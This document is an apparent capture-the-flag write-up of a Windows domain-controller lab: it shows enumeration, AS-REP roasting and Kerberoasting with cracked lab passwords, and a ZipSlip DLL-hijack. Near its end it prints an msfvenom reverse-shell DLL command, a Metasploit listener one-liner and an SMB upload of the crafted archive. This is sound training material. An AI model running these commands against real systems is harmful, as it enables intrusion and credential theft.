Overview
- Type Machines
- OS Windows
- Severity Medium
- Creator xct
- Release date 2022 Jul 2
Enumeration
Start the instance via Discord and let’s go:

10.10.106.103
Nmap
$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.106.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-28 09:56 JST
Nmap scan report for 10.10.106.103
Host is up (0.25s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22 04:55PM <DIR> app
| 06-29-22 04:33PM <DIR> benign
| 06-29-22 01:41PM <DIR> malicious
|_06-29-22 04:33PM <DIR> queue
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2025-01-28T00:49:45
|_Not valid after: 2026-01-28T00:49:45
|_ssl-date: 2025-01-28T01:00:40+00:00; -2s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after: 2121-06-29T13:33:00
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2025-01-28T00:49:45
|_Not valid after: 2026-01-28T00:49:45
|_ssl-date: 2025-01-28T01:00:40+00:00; -2s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BRUNO
| NetBIOS_Domain_Name: BRUNO
| NetBIOS_Computer_Name: BRUNODC
| DNS_Domain_Name: bruno.vl
| DNS_Computer_Name: brunodc.bruno.vl
| DNS_Tree_Name: bruno.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-28T01:00:01+00:00
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2025-01-27T00:47:53
|_Not valid after: 2025-07-29T00:47:53
|_ssl-date: 2025-01-28T01:00:40+00:00; -1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows
- Seems a domain controller of the domain bruno.vl (even if 88/tcp is not open).
- Main open ports are for FTP/HTTP/HTTPS server, DNS, LDAP, SMB and also RDP.
- Add
brunodc.bruno.vl,bruno.vlin in /etc/hosts
WEB (80/tcp & 443/tcp)

Standard IIS server so ASP should be used too
Check if ADCS is configured:
$ curl https://brunodc.bruno.vl/certsrv -k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
$ curl https://brunodc.bruno.vl/certenroll -k
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://brunodc.bruno.vl/certenroll/">here</a></body>
Confirmed, ADCS is configured on this DC
FTP (21/tcp)
Anonymous access is allowed:
$ ftp -i anonymous@brunodc.bruno.vl
Connected to brunodc.bruno.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||59534|)
150 Opening ASCII mode data connection.
06-29-22 04:55PM <DIR> app
06-29-22 04:33PM <DIR> benign
06-29-22 01:41PM <DIR> malicious
06-29-22 04:33PM <DIR> queue
226 Transfer complete.
Found 4 folders, because of the names we can see it’s related to an antivirus scanner or something similar.
Try to put a file to any folders but we don’t have WRITE permission.
Let’s download all:
$ wget -r ftp://anonymous:1234@brunodc.bruno.vl/
...
Downloaded: 7 files, 178K in 1.0s (171 KB/s)
Quick enumeration:
$ tree
.
└── brunodc.bruno.vl
├── app
│ ├── changelog
│ ├── SampleScanner.deps.json
│ ├── SampleScanner.dll
│ ├── SampleScanner.exe
│ ├── SampleScanner.runtimeconfig.dev.json
│ └── SampleScanner.runtimeconfig.json
├── benign
│ └── test.exe
├── malicious
└── queue
In the changelog file we have some interesting info:
$ cat brunodc.bruno.vl/app/changelog
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR string
- That confirmed our 1st idea about an antivirus scanner.
- A service account
svc_scanis used
In the SampleScanner.runtimeconfig.dev.jso file, we found also a user xct:
$ cat brunodc.bruno.vl/app/SampleScanner.runtimeconfig.dev.json
{
"runtimeOptions": {
"additionalProbingPaths": [
"C:\\Users\\xct\\.dotnet\\store\\|arch|\\|tfm|",
"C:\\Users\\xct\\.nuget\\packages"
]
}
}
RID Brute-forcing
Try to get the users list using anonymous and guest access but failed:
$ nxc smb brunodc.bruno.vl -u '' -p '' --rid-brute 10000
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.106.103 445 BRUNODC [+] bruno.vl\:
SMB 10.10.106.103 445 BRUNODC [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
$ nxc smb brunodc.bruno.vl -u 'guest' -p '' --rid-brute 10000
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.106.103 445 BRUNODC [-] bruno.vl\guest: STATUS_ACCOUNT_DISABLED
ASREPRoasting (svc_scan)
Quick check if the service account svc_scan is vulnerable to ASREPRoasting:
$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p '' --asreproast asreproast_output.txt
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.106.103 445 BRUNODC $krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619a18c93777a6de$6c9e311176925b1686d63d19d9f2195041373b309f7ab83054eb44576a37c21218c8a3fffd89ac0a0a4e6daa5c92730545eea2dedec1af6ff7b4e7ea4ddff2f45cd5ef80bb4262530577eadd4209d2ea1dac383ba2356102d95889e2bf3a9aab8a3a9d7524ff6d9365c99600327ae43545da983c97ac375b8d78320cbd56b10b17bb4ffe66d2d41f4eda6cc9414837771a5c3e05c79a4fea3b8e8ae3b7927c4a699b2842ebaad23f29de078cfb42c5ed3757a06562f028a9226c8dfc33fe5413788e4a0a5d3fa533c3156a4c29af3456fe1589fa71c6cb9061e14041b09795c6be52d70d
Vulnerable
Try to crack the hash with Hashcat:
$ hashcat -a 0 -m 18200 svc_scan.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...
$krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619a18c93777a6de$6c9e311176925b1686d63d19d9f2195041373b309f7ab83054eb44576a37c21218c8a3fffd89ac0a0a4e6daa5c92730545eea2dedec1af6ff7b4e7ea4ddff2f45cd5ef80bb4262530577eadd4209d2ea1dac383ba2356102d95889e2bf3a9aab8a3a9d7524ff6d9365c99600327ae43545da983c97ac375b8d78320cbd56b10b17bb4ffe66d2d41f4eda6cc9414837771a5c3e05c79a4fea3b8e8ae3b7927c4a699b2842ebaad23f29de078cfb42c5ed3757a06562f028a9226c8dfc33fe5413788e4a0a5d3fa533c3156a4c29af3456fe1589fa71c6cb9061e14041b09795c6be52d70d:Sunshine1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619...52d70d
Found
svc_scan::Sunshine1
As we have a domain user then let’s enumerate the Active Directory
BloodHound
Let’s go to enumerate the Active Directory then ingest to BloodHound Community Edition for analysis:
$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound --dns-server 10.10.106.103 --dns-tcp --dns-timeout 10 --collection All,LoggedOn
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.106.103 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
LDAP 10.10.106.103 389 BRUNODC Resolved collection methods: objectprops, rdp, trusts, group, localadmin, container, dcom, loggedon, psremote, session, acl
LDAP 10.10.106.103 389 BRUNODC Done in 00M 56S
LDAP 10.10.106.103 389 BRUNODC Compressing output into /home/user/.nxc/logs/BRUNODC_10.10.106.103_2025-01-28_103827_bloodhound.zip

Our pwned
svc_scanuser has no specific permissions or interesting out object control

We can see 2 accounts are kerberoastable:
svc_scanalready pwnedsvc_net
But svc_net seems also just a domain users without great interest at this moment:

Kerberoasting (svc_net)
Anyway, we try a kerberoasting attack:
$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting kerberoasting_output.txt
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.106.103 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
LDAP 10.10.106.103 389 BRUNODC Bypassing disabled account krbtgt
LDAP 10.10.106.103 389 BRUNODC [*] Total of records returned 2
LDAP 10.10.106.103 389 BRUNODC sAMAccountName: svc_net memberOf: pwdLastSet: 2022-06-29 22:35:45.023707 lastLogon:2022-06-30 01:29:25.394301
LDAP 10.10.106.103 389 BRUNODC $krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18defaa184bafc1c5f8c78473cf652c7$a1ace1dfe9cd5557dcb1d81c27d259ed7685889f99bba2320d3c816bff9c1d43c00f7012140dcd4506a5ac772d93ada97a26807473655877b3cecf7464df46276857a0c46938fce3d2fd4e7c4860ff05a07f5882c59fce41b5482e3808cbef6884f39703f95f66e189751f87cddbcf5927ecc559a96604bc7e574e2d07d8ebb7fdfb3a3fd93f0e4509648f5a440196ce56e649c36d1f3b5c4fb0b2425eacb098dd8f8c5b6dc8a5a4dad1ff029b10e7ffc9c5f4c9321475148be9fe2f5d38fe0d84db2f36e41ac1d00d98668b06049488eeb69d9dad70b3c7efa6e3196ba827567359cacd928e2255054bb7caea226125c1b103e811da45e5a29313e20aa3da7fb857f73e4e0ca3f0687b84696e38bf5d2380a0bea683678200f8fd842c7f4a6e0af506bc157bedfb303743040109521b99f57af8540a48c94d5e0a696809fd08caed071ffee9919806a1a8e47c9bf11c59da456726025fd94e523aaa151fb0d2955c37d37451c55c159135926ee0e7fa2350f3f0c6c67b20246bc91cc13b3b07fd8c06e8c7fcffdbe722e7f10cdb7db36efc358af2818b05f18f869fcad8f168b69fefb72fff6dc472f815e8807ffead699dfc2b538f35b3dc6dfc71360261df121c56fc2ea79d5baf91db1337dde875380770f81d0e21193ba1f5bfc60861c152580da7089a92ceaadd8196ec409508212485620abc4b231dd08be71484321c596afbdf529f4f24fa8413aa6c2be4f07c2a726c92f1cfaf4ad547e69d85f0bb57ca4613062b532a64c642d1479947744fada098a39f6433824ab92d685b237177294b7a318c6483c2c973594c1ab316f4cf0ae4414906506aa577227cfb7ca7f38580c006607b450d9d87912e6f4f2484805131c424d1cbea7daeec861c8bb2cf4d27bdcdf46ad6d9bff6904c97073b9842bbb7eb7c3ff833fe7aebc7fabbf732323558a7a14cc15280eb6708d3a12af301920f6bab468d4cbf8c600e6cb11e43a3d1bffae2d3608646dc490ca848914ee98b77b56e694e2848b2aa5669e99d4a1ebf531aff28bd1b3f0fbb7061bdb03008224c417bc4a8e2787b5ce88222aea6bcd1e2f02781dd493d82fb88d9748760baa52b15836b8b2b14f64497a78c0a5522aece86c6641851935637c7b84ae535fd6ec6e646d713787fea821849c9465dacbd9756c49d357057f1c75ad01955e006152c579ed0f1d8575df686b5d5d28fa978c6d0260277a265a98df1991189007e58e5448b81306c6a3cb0df5acd71a46a92656951aa42027b07053befcafe95f9dc30779d27c08a395530318b3816eb3fe595c5bc51577b16b29c886e083191db1faaad686d79b0c11e85bd62b5ea19491c4838599fa10d887af40d15af1ae3b7f6497ce28cd9bb373073ceb63306f9fdcea887d2e664fe962c8765606225bb
LDAP 10.10.106.103 389 BRUNODC sAMAccountName: svc_scan memberOf: pwdLastSet: 2022-06-29 22:36:15.210348 lastLogon:2025-01-28 10:55:53.438873
LDAP 10.10.106.103 389 BRUNODC $krb5tgs$23$*svc_scan$BRUNO.VL$bruno.vl/svc_scan*$f5642137b570814aa3d8aef96d24120a$09eb77f8d4e9c15b1b09d17ee0000a336d96a0c8fdc0d144fd6cf09d8aca8d45dcfb00928c1f945662f26911149dc4da16f0ffd8f4aec512e76d8d618414f91d3276e54c96ea51528b1e115e3e428c2e43104d873135efa8b27bb32971592ccd8316c870d5be562a25b1c3c2af9af899c76417d9379e81a59c8d9cf5b9f47355808c331b7504b5edba11c9ac2cbc6ccb3273c355e7458329304c9dfd7656700732ef995b4a87daac7ea38d8db3f664e512e25707e1dbf6943c53424a8445168287ef655160854720944e6196f122e96739b6dc73b7c71f8525e4c7384f9e51043008cbc50df94dd3cdf84d929255d3e63d65d598301f770fc7f1f0871700b5184298331b84a6553daa4c74b29e4a3947502401bf69c958bd3a7f2799ff1649bf5f3f657cc583d1bf8b7c3dd57ade5b6daddebc1fd723925b0bb6354f68c5ea0c7d4b7104b730c2e4f150240fd9e025492281d9ab5ac1c1987f3a649ff80085d7fc10e3de48293f9f5ca7aa81ec33b78e6ebfc09f43c8df4c13b1f3671fe0dcff95ad4e6b5599890fe8798c7ee51f18935de46d87c7fddcf078b28cc2daf0a04d9242030d2c65d4f36018d8b98b8ee0d5397739283378b678540800492361786fcc901d4620108c37751f4aa6e3cb6b379186ef4a0aaac3bc6916ee9375dff2829d526ff150c8d0d5b9995b6a33dd764e2286dc35f3fd98bf6bc14fc1f73943b9d377bc58402af8703cd43032a354b78c9795602d1c9a8b23d6b06d1b7561efde9048e81d46f76924fe2bdbb9b05bd72db420057e78e3c34540464e3a32b8eaaa0979f82437147ab10c5b9265a32dc81c6e649bfc3dec98b6a4997d3e95ec704521b03982860f78ce885157412805a5bb2209d1acf5e363f278f4d86cd683344d6156ed7a10940dbceb2d4b2bc4771782a4160b59cc93cbf64dfdfb5fa2b6134727f566e95df07dcb817a9f29a38cc27175582811d7fc1a59aec2da28265806b35c78554dd466b4e4eda8dddce72d373235dbf597fa359ba82c5e012f3fed2d69e7f2f718bc4e6d682a47d72758b35b132517b4f14168c649a59c1272a1f2c382d82272ea861cb4194f17d369976cb4f21657e223c5105478942f4fbf125cd4e23766c3598d9f2fa26b955e6d673ea3d224f88b0370184c11aa1d89425554a94f9b22a514130f80ee05e707a0bb4355300db7047640ad442bed84b85f0260e8f0a84cd9191ed41ecd8007c7707801f029d037a0a0aa713193c678963fb4a4b3d3756801e81bf507ef8022ee9080ba2328fec4aecba3ed4cb60a500b4fec9399b3c4ab727054aa02d735ff6d069a7f96e3c150277b51a6108eca01d5e9a201db7cbe7ed5029f1ae0627b070f412a81a55d3ecf21d89b7b314ea3dc42ee27f44cae0263ed0948a0ecbb00ef8b68809e1f2f28
Then try to crack the hash of svc_net using Hashcat:
$ hashcat -a 0 -m 13100 svc_net.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18defaa184bafc1c5f8c78473cf652c7$a1ace1dfe9cd5557dcb1d81c27d259ed7685889f99bba2320d3c816bff9c1d43c00f7012140dcd4506a5ac772d93ada97a26807473655877b3cecf7464df46276857a0c46938fce3d2fd4e7c4860ff05a07f5882c59fce41b5482e3808cbef6884f39703f95f66e189751f87cddbcf5927ecc559a96604bc7e574e2d07d8ebb7fdfb3a3fd93f0e4509648f5a440196ce56e649c36d1f3b5c4fb0b2425eacb098dd8f8c5b6dc8a5a4dad1ff029b10e7ffc9c5f4c9321475148be9fe2f5d38fe0d84db2f36e41ac1d00d98668b06049488eeb69d9dad70b3c7efa6e3196ba827567359cacd928e2255054bb7caea226125c1b103e811da45e5a29313e20aa3da7fb857f73e4e0ca3f0687b84696e38bf5d2380a0bea683678200f8fd842c7f4a6e0af506bc157bedfb303743040109521b99f57af8540a48c94d5e0a696809fd08caed071ffee9919806a1a8e47c9bf11c59da456726025fd94e523aaa151fb0d2955c37d37451c55c159135926ee0e7fa2350f3f0c6c67b20246bc91cc13b3b07fd8c06e8c7fcffdbe722e7f10cdb7db36efc358af2818b05f18f869fcad8f168b69fefb72fff6dc472f815e8807ffead699dfc2b538f35b3dc6dfc71360261df121c56fc2ea79d5baf91db1337dde875380770f81d0e21193ba1f5bfc60861c152580da7089a92ceaadd8196ec409508212485620abc4b231dd08be71484321c596afbdf529f4f24fa8413aa6c2be4f07c2a726c92f1cfaf4ad547e69d85f0bb57ca4613062b532a64c642d1479947744fada098a39f6433824ab92d685b237177294b7a318c6483c2c973594c1ab316f4cf0ae4414906506aa577227cfb7ca7f38580c006607b450d9d87912e6f4f2484805131c424d1cbea7daeec861c8bb2cf4d27bdcdf46ad6d9bff6904c97073b9842bbb7eb7c3ff833fe7aebc7fabbf732323558a7a14cc15280eb6708d3a12af301920f6bab468d4cbf8c600e6cb11e43a3d1bffae2d3608646dc490ca848914ee98b77b56e694e2848b2aa5669e99d4a1ebf531aff28bd1b3f0fbb7061bdb03008224c417bc4a8e2787b5ce88222aea6bcd1e2f02781dd493d82fb88d9748760baa52b15836b8b2b14f64497a78c0a5522aece86c6641851935637c7b84ae535fd6ec6e646d713787fea821849c9465dacbd9756c49d357057f1c75ad01955e006152c579ed0f1d8575df686b5d5d28fa978c6d0260277a265a98df1991189007e58e5448b81306c6a3cb0df5acd71a46a92656951aa42027b07053befcafe95f9dc30779d27c08a395530318b3816eb3fe595c5bc51577b16b29c886e083191db1faaad686d79b0c11e85bd62b5ea19491c4838599fa10d887af40d15af1ae3b7f6497ce28cd9bb373073ceb63306f9fdcea887d2e664fe962c8765606225bb:Sunshine1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18d...6225bb
Found
svc_net:Sunshine1(same password thansvc_scan)
RID Brute-forcing
We proceed to another try as we have now a domain user account, even if not helpful now, that can be use for any bruteforce attack in future:
$ nxc smb brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --rid-brute 10000
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.106.103 445 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
SMB 10.10.106.103 445 BRUNODC 498: BRUNO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 500: BRUNO\Administrator (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 501: BRUNO\Guest (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 502: BRUNO\krbtgt (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 512: BRUNO\Domain Admins (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 513: BRUNO\Domain Users (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 514: BRUNO\Domain Guests (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 515: BRUNO\Domain Computers (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 516: BRUNO\Domain Controllers (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 517: BRUNO\Cert Publishers (SidTypeAlias)
SMB 10.10.106.103 445 BRUNODC 518: BRUNO\Schema Admins (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 519: BRUNO\Enterprise Admins (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 520: BRUNO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 521: BRUNO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 522: BRUNO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 525: BRUNO\Protected Users (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 526: BRUNO\Key Admins (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 527: BRUNO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 553: BRUNO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.106.103 445 BRUNODC 571: BRUNO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.106.103 445 BRUNODC 572: BRUNO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.106.103 445 BRUNODC 1000: BRUNO\BRUNODC$ (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1101: BRUNO\DnsAdmins (SidTypeAlias)
SMB 10.10.106.103 445 BRUNODC 1102: BRUNO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 1103: BRUNO\svc_net (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1104: BRUNO\svc_scan (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1105: BRUNO\employees (SidTypeGroup)
SMB 10.10.106.103 445 BRUNODC 1106: BRUNO\Chloe.Ball (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1107: BRUNO\Kayleigh.Patel (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1108: BRUNO\Donna.Harrison (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1109: BRUNO\Charles.Young (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1110: BRUNO\Graeme.Grant (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1111: BRUNO\Natalie.Anderson (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1112: BRUNO\Sam.Owen (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1113: BRUNO\Jeremy.Singh (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1114: BRUNO\Kieran.Day (SidTypeUser)
SMB 10.10.106.103 445 BRUNODC 1115: BRUNO\Hugh.Young (SidTypeUser)
Let’s copy/paste the output to a file then get just the users and put them in a new wordlist file:
$ cat all_sids.txt | grep TypeUser | awk '{ print $6}' | cut -d '\' -f 2 > all_users.txt
$ cat all_users.txt
Administrator
Guest
krbtgt
BRUNODC$
svc_net
svc_scan
Chloe.Ball
Kayleigh.Patel
Donna.Harrison
Charles.Young
Graeme.Grant
Natalie.Anderson
Sam.Owen
Jeremy.Singh
Kieran.Day
Hugh.Young
We are proceeded a password spray attack against all users but without result.
SMB (445/tcp)
Let’s dig to SMB shares:
$ nxc smb brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.106.103 445 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
SMB 10.10.106.103 445 BRUNODC [*] Enumerated shares
SMB 10.10.106.103 445 BRUNODC Share Permissions Remark
SMB 10.10.106.103 445 BRUNODC ----- ----------- ------
SMB 10.10.106.103 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.106.103 445 BRUNODC C$ Default share
SMB 10.10.106.103 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.106.103 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.106.103 445 BRUNODC NETLOGON READ Logon server share
SMB 10.10.106.103 445 BRUNODC queue READ,WRITE
SMB 10.10.106.103 445 BRUNODC SYSVOL READ Logon server share
We have a READ/WRITE access to the folder
queuethat is interesting because it’s used on the FTP server too.
As we don`t have much more enumeration then step back to the files we have downloaded previously, included the binary of the scanner.
SampleScanner Reverse Engineering
$ file brunodc.bruno.vl/app/SampleScanner.exe
brunodc.bruno.vl/app/SampleScanner.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections
$ file brunodc.bruno.vl/app/SampleScanner.dll
brunodc.bruno.vl/app/SampleScanner.dll: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections
Now it’s time to reverse engineer the SampleScanner.exe application to see if we could perform any DLL Hijacking.
This app is written in .NET so we can open the SampleScanner.exe with dnSpy and investigate:


The app is looking for
.zipfiles in thequeuefolder, extract these file and then copy the file to another folder.
There is a common vulnerability in ZIP files, with 7zip we can edit a zip file and change the name of the files to include some path traversal ../../ so we are able to write to any location of the C: directory who the user has permissions to.
DLL Hijacking via ZipSlip
ZipSlip is essentially a vulnerability that allows us to perform file creation via path traversal in a zip archive. If a zip archive is opened automatically by a program, we can create a compressed archive with a file that has path traversal characters in its name, such as ../revshell.exe. This will place our executable in the parent folder of where it was opened.
In our case, we want to place a malicious executable in ../app/(malicious_file_here). This should be within the same path as the binary, which is where the application is trying to load DLLs from.
Since we know the names of the DLL that are not found within the application’s direct path, we can use those as the names for our malicious DLLs. We can craft a malicious DLL using msfvenom, as seen below and then convert it to a zip archive.
Investigation
Let’s first start by opening ProcMon via the Microsoft SysInternalsSuite.
We create the same structure with C:\samples\queue\ folders and put inside a test.txt and compressed test.zip files:

We also create C:\samples\app\ and put inside all file related to the SampleScanner:

Launch Procmon64.exe.
Navigate to Filter > Filter (or just Ctrl+L), and use the configuration as seen below:
- Process Name - begins with - SampleScanner -> then Include
- Path - ends with - .dll -> then Include
- Result - is - NAME NOT FOUND -> then Include

Then we launch SampleScanner.exe and we can see the output below:

We found that
hostfxr.dllis called by the app but not found then we can abuse this one
Exploitation (Bruno_User)
Create our malicious dll using Metasploit and naming ‘hostfxr.dll’:
$ msfvenom -p windows/x64/shell_reverse_tcp -ax64 LHOST=10.8.4.253 LPORT=443 -f dll -o hostfxr.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: hostfxr.dll
Set our Meterpreter listener:
$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.8.4.253:443
msf6 exploit(multi/handler) >
simple c++ reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll and created the zip file with a path traversal
Then compress it to a zip file hostfxr.zip:

Then edit the Zip file with 7-Zip and rename the file to include a path traversal:

Now we can upload it to the target to the queue SMB share:
$ smbclientng -u 'svc_scan' -p 'Sunshine1' --host brunodc.bruno.vl
_ _ _ _
___ _ __ ___ | |__ ___| (_) ___ _ __ | |_ _ __ __ _
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | | __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__| |_| |_|\__, |
by @podalirius_ v2.1.7 |___/
[+] Successfully authenticated to 'brunodc.bruno.vl' as '.\svc_scan'!
■[\\brunodc.bruno.vl\]> use queue
■[\\brunodc.bruno.vl\queue\]> put hostfxr.zip
hostfxr.zip
